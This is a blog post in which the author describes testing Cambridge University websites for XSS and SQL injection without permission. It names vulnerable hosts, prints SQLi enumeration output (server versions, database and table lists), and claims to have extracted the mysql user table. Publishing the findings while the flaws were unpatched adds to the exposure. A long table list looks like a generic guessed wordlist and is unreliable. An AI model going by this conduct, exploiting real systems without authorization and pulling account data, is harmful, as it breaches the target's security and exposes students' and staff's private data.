Cambridge University and their glaring vulnerabilities they refuse to patch.

About a month ago I decided to audit Cambridge University. I was hoping to find some webapp vulnerabilities which I could then report to get a bounty of some kind. I did a very basic audit, tested for Cross Site Scripting (XSS), Local File Inclusion (LFI)  and some other vulnerabilities such as SQL Injection (SQLi).  What I discovered for such a reputable University is crazy and the fact they won’t even respond to emails clearly implies they do not care whatsoever.

The first page I tested for XSS was their library page at http://www.lib.cam.ac.uk/

Yes, you guessed it. Vulnerable.

PoC:

 

the second page I tested was  http://webapps.fitzmuseum.cam.ac.uk

…and of course XSS yet again

Here’s my openbugbounty submission report: https://www.openbugbounty.org/reports/280729/

PoC:

 

I also looked for other things like their robots.txt file which can be found at http://www.lib.cam.ac.uk/robots.txt

I decided to stop looking for XSS on Cambridge as this site is  just littered with them. Can’t really do much either as they are non-persistent. (this doesn’t mean they shouldn’t be patched)

So to sum up the rest of this post…

 

Ok …. now let’s get straight to the more serious vulnerabilities which they should of most definitely patched by now but unfortunately they can’t even respond to emails. They also don’t seem to care at all as stated previously.

I will however post proof that these vulnerabilities can be exploited and that they are very SERIOUS.

The first SQLi vulnerability appears to be error based:

The database appears to have 20 columns from testing:

The attacker can now find the vulnerable columns and continue exploiting to get the database names/tables and then extract the data from them.

 

web server operating system: Linux Debian 8.0 (jessie)
Apache 2.4.10
MySQL >= 5.0
databases[6]
[*] generate
[*] images
[*] information_schema
[*] mysql
[*] performance_schema
[*] test

 

Database: mysql
[24 tables]
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |

And here is the data extracted from the user table in the [mysql] database. I decided to format it using Excel:

[click to enlarge image]

Data can be extracted from anyone of those databases, if a malicious attacker were to extract info from a different table within the database they could get Student Private Information, staff and even private research material stored in the mySQL database

 

I will now move onto the second SQLi vulnerability, this is on the admin sub-domain of Cambridge it has one database and over 400 tables.

Database: *
[424 tables]
| ActiveDataFeed |
| Admin |
| Affichage1Affichage1edu |
| Ansicht1 |
| Apply |
| Auftrag |
| BOOK_AUTHORS |
| BUYER |
| Bestellungen |
| CLIENTES |
| CUSTOMER |
| Campus |
| Channel_Data |
| Coefficients |
| Compagnie |
| DC_Data |
| DSProp_table |
| DWE_Subscriptions |
| DWE_Task_Attributes |
| DWE_Workflow_Documents |
| D_Abbreviation |
| D_Format |
| D_PR_EVENTOS |
| Economy |
| Editor |
| Employees |
| Etudiant |
| Film |
| FindCriteria |
| GDirectedRoute |
| Genre |
| Gruppen |
| LT_CLASSE_FORO |
| LT_CUSTOM3 |
| LT_EVENTO |
| LT_NATUREZA |
| LT_SERIE |
| Languages |
| LastName |
| Lieux |
| M_CADASTRO_GERAL |
| M_ESQUEMA_PERMISSAO |
| M_RELATORIOS |
| NUEVOS |
| OperationStatus |
| PERSONAL |
| PREFIX_order_return_state_lang |
| PREFIX_tab |
| PREFIX_timezone |
| PRODUTO |
| PROFESORES |
| PUBLISHER |
| PZ |
| Pilot |
| Propdesc_table |
| Publication |
| QRTZ_JOB_DETAILS |
| RATING |
| ROLE |
| SGA_XPLAN_TPL_DBA_IND_COLUMNS |
| SGA_XPLAN_TPL_DBA_TABLES |
| SIGNON |
| S_LOG |
| SchemaInfo |
| Slot |
| SpecificationLink |
| Standorte |
| Station_Comment |
| Student |
| Studenten |
| SurveyRespondent |
| TBLUSERS |
| THOT_SUB_MENU |
| Tagebuch |
| ThumbnailKeyword |
| Titres |
| TotalMembers |
| Umfrage |
| VenuesNew |
| Volume |
| X_3945 |
| USER |
| keys |
| language |
| translation |
| about |
| account_level |
| accounts |
| actualites |
| add_irm |
| adminpwd |
| adminuser |
| agence |
| aggtest |
| alarms |
| aliastype |
| alike |
| app_user |
| applications |
| area |
| art |
| artist |
| attribut |
| audio |
| auto_id_tests |
| autore |
| autorizacaonfe |
| banners |
| based |
| be_users |
| been |
| binn_articles |
| binn_catalog_fields |
| binn_catprops |
| binn_catrights |
| binn_form39 |
| binn_imagelib_templ |
| binn_user_rights |
| bkp_ResourceFolder |
| categorylinks |
| cdb_access |
| cdb_adminactions |
| cdb_adminsessions |
| cdb_debates |
| cdb_forumrecommend |
| cdb_imagetypes |
| cdb_paymentlog |
| cdb_pluginvars |
| cdv_map_feature |
| cdv_passport_group |
| chat_users |
| cities |
| clients |
| clubconfig |
| cmRole |
| cmsusers |
| coherently |
| compositions |
| comune |
| conf |
| config |
| connectorswitches |
| content |
| continent |
| country |
| cpg132_users |
| cpg_config |
| credits |
| css_file |
| customers_basket |
| dbstudents |
| dbuser |
| department |
| dept_location |
| detrimental |
| developers |
| diary |
| dictionary |
| div_annotation_type |
| div_locality |
| div_poly_type |
| dpt_trans |
| dtb_bat_relate_products |
| dtb_blocposition |
| dtb_customer_reading |
| dtb_deliv |
| dtb_recommend_products |
| duvida |
| e107_user |
| employer |
| emu_services |
| eventi |
| ew_temi |
| extremes |
| ezin_authors |
| f_attributedependencies |
| f_options |
| f_spatialcontextgroup |
| festplatte |
| fiscal |
| foreigntest |
| form_data |
| forum_user_stat |
| fusion_user_groups |
| ganatlebe_ge |
| geo_Island |
| geraet |
| gesuche |
| glmm |
| grau_escolaridade |
| grind |
| groupe |
| gws_client |
| has |
| hersteller |
| history |
| honorsinfo |
| ibf_members_converge |
| imagelinks |
| images |
| interactions |
| interwiki |
| intranet_users |
| invite |
| isMember |
| itemnotafiscal |
| items_template |
| itens |
| jforum_smilies |
| jiveExtComponentConf |
| jiveGroupUser |
| jiveRoster |
| jiveRosterGroups |
| jiveUserProp |
| jiveVersion |
| jobs |
| jos_estadisticas |
| jos_jce_groups |
| jos_jce_plugins |
| jos_languages |
| jos_messages_cfg |
| jos_modules_menu |
| jos_moschat_users |
| jos_poll_data |
| jos_templates_menu |
| jos_vm_auth_group |
| jos_vm_cart |
| jos_vm_category_xref |
| jos_vm_currency |
| jos_vm_product_category_xref |
| jos_vm_product_type_parameter |
| jurosstrategy |
| kategorien |
| kauf_artikel |
| kpro_adminlogs |
| lending |
| liens |
| line_items_seq |
| liste_domaines |
| livre |
| loan |
| located |
| login_user |
| mailaddresses |
| manage |
| mapdata |
| marital_status |
| math |
| mein_doc_h |
| membership |
| mima |
| minutes |
| mitarbeiter |
| mlattach |
| modulerubriquephoto |
| monitoringi_ge |
| music_association |
| mymps_advertisement |
| mymps_member_album |
| ndash |
| networking |
| newsletter_recipients |
| nickel |
| nomarski |
| noncommercial |
| notafiscal_deducao |
| notizen |
| nuke_authors |
| nuke_autonews |
| nuke_bbgroups |
| nuke_bbtopics_watch |
| nuke_bbuser_group |
| nuke_bbvote_voters |
| nuke_config |
| nuke_counter |
| nuke_downloads_categories |
| nuke_downloads_downloads |
| nuke_downloads_modrequest |
| nuke_downloads_newdownload |
| nuke_links_modrequest |
| nuke_main |
| nuke_poll_desc |
| nuke_pollcomments |
| nuke_reviews_comments |
| nuke_session |
| nuke_stats_month |
| nuke_subscriptions |
| nulltest |
| obb_profiles |
| oil_bfsurvey_pro |
| oil_bfsurveypro_34 |
| oil_bfsurveypro_35 |
| oil_biolmed_entity_types |
| oil_dbcache |
| oil_modules_menu |
| oil_newsfeeds |
| oil_phocadownload |
| oil_phocadownload_categories |
| oil_phocagallery_votes |
| oil_rokdownloads |
| orders |
| organization |
| osc_manufacturers |
| osc_products_attributes |
| otherwise |
| package |
| pagelinks |
| paper |
| participate |
| periods |
| phorum_user |
| phpbb_banlist |
| phpbb_topics_watch |
| phpbb_vote_results |
| platforms |
| pma_relation |
| pma_table_coords |
| pma_table_info |
| polarised |
| poll_user |
| precipitation |
| preferences |
| presence |
| product |
| produtos |
| project_user_xref |
| property |
| province |
| pw_adminset |
| pw_forums |
| pw_hack |
| pw_wordfb |
| pwds |
| qrtz_simple_triggers |
| radacct |
| reciprocal_links |
| reciprocal_partnersites |
| registered |
| report |
| reserve |
| river |
| root |
| roots |
| rss |
| rss_subscription |
| sampleData |
| schema_info |
| seen |
| sf_guard_remember_key |
| singup |
| slserver |
| spip_caches |
| spip_meta |
| spip_mots |
| spip_versions |
| spip_versions_fragments |
| spip_visites |
| spip_visites_articles |
| stable |
| state |
| store3 |
| ststaff |
| stuser |
| subject |
| subscribe |
| sysadmin |
| system |
| t_snap |
| tables_priv |
| tb_nguoidungs |
| tblLayouts |
| tbl_login |
| tbl_works_categories |
| tblblogroles |
| tbllogins |
| tbuseraccounts |
| team |
| test_user |
| tester |
| three |
| time_zone_leap_second |
| transactions |
| trigger_depends |
| turizmi_ge |
| tusers |
| tx_tcdirectmail_clicklinks |
| u_n |
| un |
| uname |
| uniquetest |
| user_groups |
| user_nm |
| user_un |
| user_uname |
| user_usern |
| useradmin |
| userid |
| usern |
| usr_pw |
| vbulletin_session |
| vcd_CoversAllowedOnMediatypes |
| vcd_PornStudios |
| vcd_Pornstars |
| vcd_VcdToPornstars |
| vcd_VcdToSources |
| vendor |
| veranstalter |
| vertex |
| videos |
| vrls_listings |
| vrls_partners |
| vrls_xref_listing_type |
| vrls_xref_state_province |
| ways |
| webcal_config |
| webcal_entry_ext_user |
| win |
| wp_pod_types |
| wp_usermeta |
| writes |
| x_admin |
| xb0c |
| zo_kontakt_stelle |
| zones |

I don’t really want to drag this on so I will move straight onto the last SQLi Vulnerability:

And yes again, this can be exploited. 

 

Database: information_schema
[40 tables]
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |

So the message here is simple: get your sh*t patched and stop compromising student/staff data!

I wrote this up pretty quick and only decided to include database names & tables as I don’t want to compromise Cambridge anymore than they already are.

 

hope you enjoyed this lil writeup:)